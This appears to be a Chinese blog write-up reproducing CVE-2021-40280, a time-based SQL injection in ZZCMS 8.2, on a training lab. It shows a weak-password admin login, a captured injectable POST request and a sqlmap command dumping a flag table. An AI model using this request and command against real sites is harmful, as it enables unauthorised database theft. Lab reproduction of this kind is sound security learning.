CVE-2021-40280

CVE-2021-40280

站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。 zzcms8.2中在admin/dl_sendmail.php存在sql注入漏洞

弱口令 admin/admin 登录

CVE-2021-40280_第1张图片

直接访问,会阻止

CVE-2021-40280_第2张图片

但是在后面跟上问好参数就可以访问了! 这两条数据是我在测试的时候,添加的。

因为给的提示是在 /admin/dl_sendmail 所以尝试了这几个发送的 请求包,抓包后然后保存成文件然后再使用Sqlmap跑出

CVE-2021-40280_第3张图片

但是发现,Sqlmap都跑不出结果,最后尝试,这个查询功能的请求包进行发包,请求包如下:
4个发送邮箱点
CVE-2021-40280_第4张图片
查询功能点
CVE-2021-40280_第5张图片

POST /admin/dl_manage.php? HTTP/1.1
Host: eci-2ze1hvr9navfw3w1m42t.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Origin: http://eci-2ze1hvr9navfw3w1m42t.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze1hvr9navfw3w1m42t.cloudeci1.ichunqiu.com/admin/dl_manage.php?
Cookie: zxbigclassid=1; zxsmallclassid=0; PHPSESSID=mbsjjubmt5h48ldqiv33gr5rs1
Upgrade-Insecure-Requests: 1

kind=tel&keyword=1234444&Submit=%E6%9F%A5%E6%89%BE

使用这个请求包,跑出了个延时注入。

CVE-2021-40280_第6张图片

然后根据以往的经验

sqlmap.py -r 1.txt --random-agent --batch -D zzmcs -T flag --dump

CVE-2021-40280_第7张图片

你可能感兴趣的:(CVE漏洞复现,web安全,sql,网络安全,mysql)